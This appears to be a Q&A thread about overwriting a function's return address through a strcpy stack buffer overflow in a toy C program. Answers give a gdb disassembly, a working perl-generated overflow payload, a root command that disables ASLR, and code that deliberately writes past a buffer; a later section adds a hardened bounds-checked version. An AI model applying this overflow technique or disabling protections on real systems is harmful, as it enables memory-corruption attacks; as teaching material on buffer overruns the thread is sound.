C code: how to change the return address in the code?
Solution 1
From what I understand, you want the code to execute the instruction x=1; and then jump over the next printf so it will only print x is 0. There's no way to do that.
However, what could be done is making func() erase its own return address so the code would jump straight to printf("\nx is 0\n\n");. This means jumping over x=1; too.
This is only possible because you are sending to func() whatever is passed through the cmd-line and copying it directly into a fixed-size buffer. If the string you are trying to copy is bigger than the allocated buffer, you'll probably end up corrupting the stack, and potentially overwriting the function's return address.
There are great books like this one on the subject, and I recommend that you read them.
Loading your application on gdb and disassembling the main function, you'll see something similar to this:
(gdb) disas main
Dump of assembler code for function main:
0x0804840e <main+0>: lea 0x4(%esp),%ecx
0x08048412 <main+4>: and $0xfffffff0,%esp
0x08048415 <main+7>: pushl -0x4(%ecx)
0x08048418 <main+10>: push %ebp
0x08048419 <main+11>: mov %esp,%ebp
0x0804841b <main+13>: push %ecx
0x0804841c <main+14>: sub $0x24,%esp
0x0804841f <main+17>: movl $0x0,-0x8(%ebp)
0x08048426 <main+24>: mov 0x4(%ecx),%eax
0x08048429 <main+27>: add $0x4,%eax
0x0804842c <main+30>: mov (%eax),%eax
0x0804842e <main+32>: mov %eax,(%esp)
0x08048431 <main+35>: call 0x80483f4 <func> // obvious call to func
0x08048436 <main+40>: movl $0x1,-0x8(%ebp) // x = 1;
0x0804843d <main+47>: movl $0x8048520,(%esp) // pushing "x is 1" to the stack
0x08048444 <main+54>: call 0x804832c <puts@plt> // 1st printf call
0x08048449 <main+59>: movl $0x8048528,(%esp) // pushing "x is 0" to the stack
0x08048450 <main+66>: call 0x804832c <puts@plt> // 2nd printf call
0x08048455 <main+71>: add $0x24,%esp
0x08048458 <main+74>: pop %ecx
0x08048459 <main+75>: pop %ebp
0x0804845a <main+76>: lea -0x4(%ecx),%esp
0x0804845d <main+79>: ret
End of assembler dump.
It's important that you notice that the preparation for the 2nd printf call starts at address 0x08048449. In order to override the original return address of func() and make it jump to 0x08048449, you'll have to write beyond the capacity of char buffer[24];. For this test I used char buffer[6]; for simplicity.
While in gdb, if I execute:
run `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
this will successfully overrun the buffer and replace the return address with the address I want it to jump to:
Starting program: /home/karl/workspace/stack/fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
x is 0
Program exited with code 011.
(gdb)
I will not explain every step of the way because others have done it so much better already, but if you want to reproduce this behavior directly from the cmd-line, you could execute the following:
./fun `perl -e 'print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"'`
Keep in mind that the memory addresses that gdb reports to you will probably be different than the ones I got.
Note: for this technique to work you'll have to disable a kernel protection first, but only if the command below reports anything other than 0:
cat /proc/sys/kernel/randomize_va_space
To disable it, you'll need superuser access:
echo 0 > /proc/sys/kernel/randomize_va_space
Solution 2
The return address from func is on the stack, right near its local variables (one of them is buffer). If you want to overwrite the return address, you have to write past the end of the array (possibly to buffer[24...27], but I am probably mistaken - it could be buffer[28...31] or even buffer[24...31] if you have a 64-bit system). I suggest using a debugger to find out the exact addresses.
BTW, get rid of the ret variable - you accomplish nothing by having it around, and it might confuse your calculations.
Note that this "buffer overrun exploit" is a bit hard to debug because strcpy stops copying stuff when it encounters a zero byte, and the address you want to write to the stack probably contains such a byte. It will be easier to do it like this:
#include <stdio.h>

void func(char *str)
{
    char buffer[24];
    /* Parse the hex string and store the value just past the end of buffer;
       the cast gives sscanf the unsigned int pointer that %x expects.
       Replace the 24 by 28, 32 or whatever is right for your layout. */
    sscanf(str, "%x", (unsigned int *)(buffer + 24));
}
And give the address on the command line as a hexadecimal string. This makes it a bit clearer what you're trying to do, and easier to debug.
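Both answers come down to the same root cause: strcpy() in the question's func() copies until it meets a zero byte, with no regard for the 24-byte buffer. As an added example (not code from the question or from either answer), here is a hardened func_safe() that checks for the terminator inside the buffer's bounds before copying anything, so an oversized argv[1] is rejected instead of reaching the saved return address. The 30-byte SAMPLE_OVERSIZED string is constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_LEN 24   /* same size as the question's char buffer[24] */

/* Hardened replacement for the question's func(). Instead of strcpy(),
 * which keeps copying until it meets a zero byte, look for the terminator
 * within the first BUF_LEN bytes using memchr(); if it is not there, the
 * input cannot fit and is rejected before a single byte is written.
 * Returns 0 on success and -1 if the input was rejected. */
int func_safe(const char *str)
{
    char buffer[BUF_LEN];
    const char *nul = memchr(str, '\0', BUF_LEN); /* reads at most BUF_LEN bytes */
    if (nul == NULL) {
        return -1;   /* no terminator inside the buffer: this would overflow */
    }
    memcpy(buffer, str, (size_t)(nul - str) + 1); /* +1 copies the terminator */
    (void)buffer;    /* the saved return address above buffer is untouched */
    return 0;
}

/* Constructed sample input: 30 bytes, longer than BUF_LEN, so func_safe()
 * must refuse it. With the original strcpy() version this length already
 * reaches past the buffer's end. */
const char SAMPLE_OVERSIZED[] = "123456" "AAAAAAAA" "AAAAAAAA" "AAAAAAAA";

int main(int argc, char **argv)
{
    int x = 0;
    const char *arg = (argc > 1) ? argv[1] : "";
    if (func_safe(arg) != 0) {
        fprintf(stderr, "argument too long: max %d bytes\n", BUF_LEN - 1);
        return 1;    /* x stays 0; the x = 1 line is skipped deliberately */
    }
    x = 1;
    printf("\nx is %d\n", x);
    return 0;
}
```

The rejection path is the only way the program ever "skips" x = 1: a deliberate check, rather than a corrupted return address.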
Santosh V M
Updated on April 05, 2020
Comments
-
Santosh V M over 3 years
I just wrote a C program, which is below:
#include<stdio.h>
#include<string.h>

void func(char *str)
{
    char buffer[24];
    int *ret;
    strcpy(buffer,str);
}

int main(int argc,char **argv)
{
    int x;
    x=0;
    func(argv[1]);
    x=1;
    printf("\nx is 1\n");
    printf("\nx is 0\n\n");
}
Can you please suggest how to skip the line printf("\nx is 1\n");? Earlier, the clue I got was to modify the ret variable, which is the return address of the function func.
Can you suggest how to change the return address in the above program so that printf("\nx is 1\n"); is skipped?
I have posted this question because I don't know how to change the return address.
It would be great if you could help me out.
Thanks
-
Talljoe over 12 years
Danger! That is probably not what you want to do. It will cause you WAY too many problems.
-
Brian Roach over 12 years
Your code makes no sense ... what are you trying to do?
-
Marc B over 12 years
You're basically trying to accomplish something like a 'delayed goto' - good luck. And enjoy all the forced crashes you're about to generate while trying to make this work.
-
karlphillip
It's not clear what you want to do. Do you want to have a separate program to do this? Are we talking about exploiting software? Shellcode? This is so dangerous: strcpy(buffer,str);
-
jschmier
Are you trying to do something similar to this?
-
anatolyg over 12 years
I think it's important to understand how buffer overruns work, especially if you program in C, so providing help is important!
-
flolo over 12 years
@anatolyg: Maybe, maybe not; whether this results in a buffer overrun depends heavily on the architecture used - imagine Harvard architectures or new stack-smash protection mechanisms; the compiler could inline it (or optimize it completely away). So many possibilities, so it's a senseless question. In my eyes, when he wants to know something about buffer overruns, he should ask about that.
-
Amit over 9 years
Can you explain how you wrote the following: print "123456AAAAAAAA"x1,"\x49\x84\x04\x08"
-
Brian White over 6 years
Some of us might be trying to understand how this works in order to actually fix bugs. Not everyone is malicious.